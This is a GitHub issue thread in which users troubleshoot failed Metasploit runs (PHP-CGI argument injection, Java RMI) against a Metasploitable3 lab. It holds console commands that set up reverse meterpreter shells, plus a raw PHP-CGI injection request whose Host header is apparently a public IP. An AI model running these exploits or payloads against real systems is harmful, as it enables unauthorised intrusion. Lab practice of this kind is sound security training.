Exploit completed, but no session was created

[Individuum92]

Hello,

I am having a problem running a SQL injection against an outdated version of PHP. I am operating from a current Kali Linux with current MSF as opertational VM and a metasploitable3 as victim.

I am using the exploit multi/http/php_cgi_arg_injection.
The VMs are mutually pingable. No AntiVir installed. Assigning the options and executing the injection:

msf6 > use exploit/multi/http/php_cgi_arg_injection
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/php_cgi_arg_injection) > set LHOST 192.168.0.23
LHOST => 192.168.0.23
msf6 exploit(multi/http/php_cgi_arg_injection) > set RHOSTS 192.168.0.230
RHOSTS => 192.168.0.230
msf6 exploit(multi/http/php_cgi_arg_injection) > set RPORT 4444
RPORT => 4444
msf6 exploit(multi/http/php_cgi_arg_injection) > run
[*] Started reverse TCP handler on 192.168.0.23:4444 
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/php_cgi_arg_injection) > 

After running the "run" command, the execution hangs for some time at [*] Started reverse TCP handler on 192.168.0.23:4444
Since I don't get an error message, I don't think it's an exploit problem. I have now already tested a few systems.
The Google suggestions were also unsuccessful. This seems to happen more often. Does anyone have an idea?

Metasploit version

Framework: 6.2.31-dev on Kali 2022.04 (was already pre-installed)
Console : 6.2.31-dev

Additional Information

The exploitable VM is metasploitable3 (https://github.com/rapid7/metasploitable3) as .ova imported in Oracle VirtualBox

[bcoles]

You can set verbose true to see verbose output, then use the check method to check if the remote host is vulnerable.

You can set HttpTrace true and re-run the module to see the raw HTTP requests and associated responses. This may help you diagnose your issue.

msf6 exploit(multi/http/php_cgi_arg_injection) > set RPORT 4444
RPORT => 4444

Is the remote service running on port 4444?

[Individuum92]

Thank you for your answer!

Right, the port was not correct. In the Metasploitable environment the following http ports are open and listening:

http 80/tcp
http 80/udp
https 443/tcp
https 443/udp
http-alt 8080/tcp
http-alt 8080/udp

So I tried as LPORT 80 as well as 8080.

I also set the php/meterpreter/bind_tcp payload. Now the output after the run command also looks a bit different.
However, I now get the message:

192.168.0.230 - Meterpreter session 2 closed. Reason: Died

After running the check command I get the following message:
[*] 192.168.0.230:8080 - The target is not exploitable.

This message is quite meaningful ...
The system is not exploitable. Have I made a mistake or is there no valid exploit for this?

I am currently in the process of delving deeper into the subject. After a few days of testing and reading, I can't get any further.
It is correct that the port of the web server is used, isn't it?

Thank you very much for the help!

[Tslr-Anas]

Hey anyone can help me ? i have this issue

[*] Started reverse TCP handler on 192.168.2.5:4444

####################

Request:

####################
POST /?--define+allow_url_include%3d1+--define+safe_mode%3d0+--define+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+--define+open_basedir%3dnone+--define+auto_prepend_file%3dphp://input+--define+cgi.force_redirect%3d0+-%64+cgi.redirect_status_env%3d0+--no-php-ini HTTP/1.1
Host: 45.145.227.27
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1118

[github-actions]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[bcoles]

So I tried as LPORT 80 as well as 8080.

I also set the php/meterpreter/bind_tcp payload. Now the output after the run command also looks a bit different. However, I now get the message:

192.168.0.230 - Meterpreter session 2 closed. Reason: Died

bind payloads create a bindshell (if successful). If you have set lport to 80 (or 8080), then Metasploit will try to connect to the remote host (rhost) on lport (port 80 or 8080). As per your nmap output above, these ports are already open and already have services listening. Metasploit will try to establish a session with these existing services which is obviously doomed to failure.

After running the check command I get the following message: [*] 192.168.0.230:8080 - The target is not exploitable.

This message is quite meaningful ... The system is not exploitable. Have I made a mistake or is there no valid exploit for this?

It is not clear what you are trying to exploit, or how you're trying to exploit it, or why.

The original post talks about "SQL injection" then proceeds to talk about an unrelated command argument injection in PHP when run as CGI.

This vulnerability is a decade old. You should verify whether Metasploitable3 is vulnerable to this issue.

You can set verbose true to see verbose output, then use the check method to check if the remote host is vulnerable.

You can set HttpTrace true and re-run the module to see the raw HTTP requests and associated responses. This may help you diagnose your issue.

---

This issue was abandoned more than 2 months ago. Closing.

[bcoles]

After running the check command I get the following message: [*] 192.168.0.230:8080 - The target is not exploitable.

This message is quite meaningful ... The system is not exploitable. Have I made a mistake or is there no valid exploit for this?

There was a bug in the check method (#17822). check returned false negatives if the disclosed source code did not include <?. Fixed in #17823.

[jonnyfrez81]

Any info on this? I have the same problem. It feels like I have tried everything. Updated the meta, changed the network on the VB connection. Worked through alot of diffrent port but still i get the same result:

msf6 exploit(multi/misc/java_rmi_server) > set LPORT 80
LPORT => 80
msf6 exploit(multi/misc/java_rmi_server) > run

[] Started reverse TCP handler on 192.168.0.88:80
[] 192.168.0.89:1099 - Using URL: http://192.168.0.88:8080/8rFNYm90iP
[] 192.168.0.89:1099 - Server started.
[-] 192.168.0.89:1099 - Exploit failed: RuntimeError The connection with (192.168.0.89:1099) timed out.
[] 192.168.0.89:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) > sessions

Active sessions

No active sessions.